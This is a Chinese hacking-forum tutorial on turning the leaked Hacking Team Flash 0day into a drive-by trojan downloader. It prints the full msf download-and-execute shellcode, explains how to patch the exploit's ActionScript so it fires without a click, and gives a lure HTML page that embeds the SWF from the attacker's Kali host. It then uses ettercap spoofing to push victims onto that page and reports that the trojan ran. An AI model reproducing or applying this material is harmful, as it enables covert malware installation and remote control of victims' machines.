中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

; h2 Y/ M- P3 P4 `' {1 M6 t) E 三、flash 0day之手工代码修改制作下载者实例入侵演示 8 b' G6 F& @. a5 l3 w; z/ x

4 z: h3 F, p6 ~! k+ s3 c$ B

4 O) _4 Z8 Y# D2 K2 } 利用到的工具: & E1 S# I4 @: `) h

) w0 S1 m3 X$ x+ W' t: G

3 U$ O" a' V1 s- R Msf " v; T* V- B8 M4 B

9 ^, e. w* K5 j, f% j8 U( `4 d

. G$ D/ n J3 q) T Ettercap ; o$ }: v/ |- Q- R

6 Z7 h! {7 {9 _3 F7 J1 f

! _6 J9 }$ u9 z$ G Adobe Flash CS6 ( z/ L! x" q9 j( @

) P! c1 [" ^' j9 a7 w

; U" o9 M* m( f# M Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 1 J6 h R0 c1 k# \8 ?

' I- V6 w. B) j9 d v. w9 C

% v/ }' \ M7 w' H* J/ \- l+ p D 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 9 S* w+ N5 H+ ]6 c) Z5 D, A' b

/ i2 k& _6 i5 h+ g+ T" n. K

, s5 U# |/ s+ g( i) I( g 如图: 9 ]: b0 {/ f! T3 S6 ^

4 Q$ v5 o( u% e3 {6 S# C. i

' W6 x8 S* _. o4 v0 \; X   - [$ o" c+ u, a! o7 V4 o. Y

! v2 |- T: G I( K+ A

7 y |, E+ ^: {2 @& P z3 J/ |   2 ?8 c9 V4 ?% x

) G/ \: j, I, _6 ] J! L! W3 x

! R' L4 r8 i k; R# `1 u 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 C% O- C( v! A5 ]" P

; F' Z( D- h, }3 K: w

6 H; J! r5 j6 |$ \& T6 A8 R2 b" _   : G% a( ~; ~0 P2 P7 V: _8 y

( A6 s% w9 |/ x. e

& i. _, o, g: p% g) ?" R   * n) H2 U, b1 X+ Y2 q M4 `. E' ^& X

3 D! O3 ]+ T0 B9 R1 u

0 N( T' d- r2 k( \5 g 然后执行generate -t dword生成shellcode,如下: * @0 O5 S U1 L9 A8 v# L

2 o+ w$ A0 x! Q6 o4 K3 [/ M

. Z1 j( J% z0 F3 Q   - _. f4 @9 i, P: ?' {( L

! i. b+ i! ~' W

. B" d' U! q8 }0 C8 U8 O 复制代码到文本下便于我们一会编辑flash exp,如下: . C: Y, Q+ |, A; U2 x& x1 Q

( g, p# ~ ~* `

! V/ u1 p% \3 r: _8 ^' ~3 Z$ N 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, S4 {! @( R, r, f. {

0 R0 C( a% e7 \8 w+ w

' C' {1 ^5 K8 P5 O7 S4 k! A 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, e, ~+ s- K% J+ }% A$ ~

1 b. V' E( H3 S; ~3 z* E& s2 Q

4 }! o( P' X9 E1 K5 w/ ^& v% j 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, u7 M% M- S. ?" B

" d3 {0 l' O; V

6 U( E( i7 L% g x: E 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) c3 u; E( k+ ~& ]4 L

3 B3 }4 z8 h8 a: T" p: I) M

- M2 c+ U6 g" a- j4 Q 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, , B j2 Y& t: S& F2 Z' ^

8 C0 H+ }( L7 H) Y3 O1 m. q

7 i/ ]$ U4 W0 a0 I) a4 H. _- a 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 w9 U; R; v! r4 Y2 j) f1 B

9 b0 `- W4 S6 R) _. n

% y2 E; Q3 ^- A, l, y, X! Z 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, " _, m6 o# c: I

0 `1 k$ N! w8 G

" p. B2 V' L6 M0 [# S$ t 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, % E4 p- W- Y2 B

& ^( e7 y5 D6 ^- i3 H6 T6 \7 Z

: P/ _) B1 W, K* c$ c 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, & @0 I9 h/ K# y4 H4 F* V

/ O- r9 P9 M8 C ^: N0 \( ?6 r

# X& @/ J5 H3 G V% A 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : s0 A2 i }9 P4 G) T1 D% Y

, |/ n. V3 f( ^- O8 {& P7 d/ ^

+ T3 K2 q9 S& @, C7 R 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 2 _/ ^* a) E+ s" E

# K" a6 s: H2 l' F9 F5 R5 H* U

6 Q. n' k5 [8 U, s- n 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , h7 I: t. u7 {# T' ~9 p2 J) z U$ o

9 X4 Z+ c3 y7 V, k$ _! |0 S2 |

' W9 x9 H) z; {/ a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 A) O9 ]1 ^) r6 Q+ e; u3 O

/ A; f' L" A6 @$ N

9 y5 P3 H/ v2 }) c3 Q 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : O# D+ h6 k% m* q

6 q9 S% D5 y5 n$ z/ h5 c9 S0 O

7 _( @0 o9 e1 A5 {   $ o& c, K1 o4 Q. a& F* z

4 f. c5 r H* J$ {9 S

! ]! \' R9 \: g* c }   7 B: c( v$ J" e* E% j% g. U9 x# p

2 I5 U0 [ q( k# Y, I6 h

) h, \3 W. f; N0 y7 f 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! Z) g$ b( P+ X: N

' G' h7 I6 s- z; n. |" D# z2 g

& f4 Z) g* U* o2 F5 F$ S8 ^   # w% ^# @ i! n6 \: [

, O: c' X I* u& v/ N4 g* O

& b4 t$ t, I' J4 U8 }: M 先修改ShellWin32.as,部分源代码如图: ' J, w s9 c# k9 w$ M3 }

7 U/ e. P4 j) L9 s2 x

9 t3 K+ p+ y6 D0 i+ C$ m   % \0 [% p1 Y! I2 P/ E

' ~' l* ~6 W" V5 o+ \3 a

& G! \( t$ [2 U y) w, ~ 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 x. E+ \6 P1 m* Z9 c% {

7 @" r! ?* D# A* u# X N$ }

+ a9 ^+ s, A7 {2 W& S   6 F$ m: E) `; C

, ?2 \) s) L! P1 n

4 P3 L- d$ f, U! d. Y9 u 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: " q) _- |# R; K* y; R* A

; P j# y) L# I1 n( D4 ~

5 K9 N! z, Y% N! m   % m4 q3 s8 T+ E

( W3 {, V& z+ W" P/ o7 K$ }: U0 f

2 j1 i" L/ Z; g0 j/ b: k2 T: Q1 g: | 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 3 y) {0 _8 q% Y9 v: ~/ ^6 p0 r

4 A" ~3 B, v0 m% x( |* I w

% M/ s) B; k* c   # Q# f( k+ I. [/ ?9 G6 Q

h: m. A8 _- p; }, p( R( u9 P

2 O# {8 }6 ^1 e* K! ?' w3 Z   , {3 ?( i6 P1 ~0 N' ^+ |* {

8 c; E0 Z0 |# N4 i

3 [& `3 C3 R0 V' S   ! i* \ j9 y- g |7 f* Y

K% M3 x% R$ H0 Q$ r0 n: w

+ {) x- b0 \' L5 \8 A6 v4 j+ t* M4 y 然后点保存,下面我们来编译一下,打开 + F) I2 X6 C; H) j' I/ r6 I

7 H, ^( f( _# i* f( e

; ?* L) h/ l8 I; d exp1.fla然后点文件-发布,看看编译没错误 . b# k1 A8 O) \, b+ ?1 L0 t& Q; b2 q

* D E0 F! F! {

. i/ j9 J( M: L# E   8 P% D- s9 V2 q

: w$ @; S7 T' Y* U

' C" A, a; B9 N* ^+ d( H' h   % J6 B& i# a* S+ ^- q" `/ p

+ ~1 O8 F' V% ~" a3 { C, _% b

0 {) Q1 X* S* h/ h0 a% h. `   1 D& ~) m$ B2 R! B* G' t2 w7 R3 Q2 a7 {

+ Q. y$ t8 |: x; b) B4 [9 r

0 e( h4 m$ @ ^- o' S   + O) b7 {- U2 Z) V! j) B/ g

% q v3 n7 P. ~3 r

, c2 r" S# W/ d 然后我们把生成的 6 k/ A+ D' T( A& R5 e

( m' F6 _ d* r; q6 h

( i) n f* g' } exp1.swf丢到kailinux /var/www/html下: $ a* e% k! _" F$ f z8 l: z# {9 F

) @: {3 r% @$ @

& ?, ^- h5 d' V1 M 然后把这段代码好好编辑一下 0 Z" p* U4 _0 E4 O9 g

: G K6 R n5 i

( S2 ~: F4 M/ F& m' \- X& V   N% W% u$ G- b2 \

7 d; L, F3 r2 X( M6 U5 `) D! a

& t5 z1 s8 V- g   ) }% K- e1 z, }8 F" G

& A' U( e3 a# f) w/ |. y

: F- ^% z& D% D   " S2 ~$ ~8 u9 M+ c6 {! I2 e

' C, o+ \: F$ w$ ^. E2 q9 g3 i6 P

/ J' z3 A) K7 K& o: r" G9 _1 p3 o   + T- m6 E; K6 b

. i R$ z; n) A

& t. m( c+ u2 u* U& M. c% M, F9 c   ; X& t) s' P- a7 g8 O: X: G

. y" I& {6 S: O

: R# P$ t! {1 Z5 _2 [   3 M4 m) H7 Y! E4 q6 t

; m- P; i# L; K" a+ J; ?

( }3 [0 V3 c( u# {' \: @ <!DOCTYPE html> - k8 v' A: K4 C# U) u' d

# w; }* l/ {4 L' F# h, _# n$ X0 \

, Q. S- u+ \& c8 C <html> 6 G; C2 P9 S. \2 z

0 N) l2 e7 y" U

! X; K# l: W3 {) E t <head> ! e' i& S& @2 z* g$ c

3 X8 r) Z1 }$ d6 D4 G

: @" l3 o' o3 A0 b% J <meta http-equiv="Content-Type" content="text/html; - ]) p8 k- Z2 B% R* x7 C/ M

7 o. ^! r0 ~( V

4 u6 M/ k- B3 ~) } { charset=utf-8"/> ; \, X: j* e o

8 `9 \' z/ A; H8 [0 P; F; C1 j. h

3 s6 ?6 F& ^* J/ R8 W </head> ) H% B$ {0 J! S' y; I" y+ |

' ^' {, F1 }8 u; _$ C

/ ?, ~, J8 q; d9 b1 o <body> 4 y- C) f6 r8 q8 J! O! P4 @8 @5 K$ S

2 H/ H. W+ V( p: }) @! d

) E$ z0 b# N) _ <h2> Please wait, the requested page is loading...</h2> 6 `% K: w9 ]' k4 y1 |

- H( K6 G' x( Y l9 \3 s2 Y

! C& V+ [& Z7 b( Z' a6 w9 Y <br> ' ?6 }2 i' d# i

5 S+ D4 C8 t& o- Q

/ _& q( i1 ?- B- ~7 N <OBJECT % j: f6 w3 J% k' b4 }

7 o/ a; W, M; N* B9 ^

$ V, S: ~6 S: c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 7 `; ~& @# v" }4 D4 o6 _" V+ P

, g6 F' ]3 W! x) ] \3 p

, |2 z+ h* }- Q" h/ T# `2 ]# | VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 l) p0 G4 y7 N$ A/ O

0 _; x w: N: z* X

9 }" C' [. R& [# q </body> 8 h* ^. M6 Q t7 _: |

: U7 Y+ Y" B5 h- r9 {" [

( N! L- ~0 N# Z9 B6 `% a <script> 8 J. R$ b2 e; c/ K" e' U

6 Q5 t4 P; o" M+ B8 F; w! `6 Q

8 \, u$ h% \& n2 D     setTimeout(function () { . t) y& U0 z }; e& C: @- a( N

0 {. m; O3 B) d

% b; p+ ]& R# t) L          7 M( x# w# O0 Y

2 ?6 K+ t) m7 _# O, P) L' }( ~) L

6 L2 S$ \5 O( A* w window.location.reload(); ! w% I, V5 X) A& L

# G, A1 A" A0 o ?6 F

/ e/ C: @: @. I     }, 10000); ! _+ R" l& N- [6 U1 G

$ G) p8 x( x4 |* p7 V; U" x' n

* [5 q6 n. v% t+ o1 F0 `   ; T+ N1 a( }: r, V/ f

* _# j, x- i- i( g4 U' g

5 B$ _( c( \1 A3 s </script> 6 j! h* P1 j1 S

& i$ E5 F* p+ N/ s0 T, R0 h2 D

7 _9 R* J- u- S3 N+ r% ` </html> ( Y6 q( x0 R3 h. Y

1 |5 l: _3 k5 s

" i0 W9 v1 X* S   u( F' t; [9 E0 v. E

8 |: s. K, B/ S- q |3 R+ u+ u

; c. H1 n& T/ _ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 5 O: V6 @/ t+ g5 b/ C$ {

+ [! \3 P/ t9 H0 c

5 M# n O ] ~9 A. f$ W) g   ' k9 ~9 U- ?2 t+ S3 {1 g

# S! @3 l+ U. y

* q" z: v6 |9 J0 R   8 z% b* t; ?) D- f8 b% F1 P

. N+ M. t6 P, i, w: X- {- _

" W$ w1 ?) P" }$ T   - M+ ?' {' H9 c

' Z7 N! p' @& d" w$ ]* Z

% V8 ~- S$ X; Q" K6 F   8 ^' x% H7 ~ R# [% A$ u1 W

& r; }/ n! t' l3 s) e

8 S- }6 ]6 e- L+ D2 T   ) [ X/ t3 X# D9 X- J/ C7 t2 p

- O/ p9 g" e7 H6 n1 O7 ?- R

/ P( A( ?1 @% S4 x 下面我们用ettercap欺骗如图: 6 H2 s- Q# x. W6 C

}! K* o' f8 H3 c9 V, J

' W1 t. O) J5 U1 {( T, Q, s   ; d0 n, t1 K( M. v' s* J

3 `. @7 S* q8 R6 S$ }+ b& j

8 D8 B9 G+ F" ]+ w7 C. N& D; \   2 p5 w5 _8 }5 M; g4 Z6 r

7 G; o9 _( \/ v6 D( V, B

1 U2 b2 C' R( a7 c( K9 q 下面我们随便访问个网站看看: - C1 O: O* C: q' O

8 T5 Y. l2 I" i$ \4 X% ^1 d+ n8 c1 e

- G; x( X( o U- e5 d4 i 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! B0 ^% H, J9 U' H

! `2 O. G! p8 S& W ]

; b" Y5 S1 S1 \/ h& ~* b0 T   8 k1 _! v5 [( s8 d2 Y" e4 {

/ \: ?( [) Q9 S( |2 }2 x" [* W

; u; C& t- f3 W8 U 我们看另一台, 6 W8 p4 t8 e& Q8 I B

" N8 ?. Y2 }) p+ w% K$ e3 w& {# ~# {5 N

% N& }( j" g' U' W* P 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 k5 W. u1 S$ C w9 ?






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2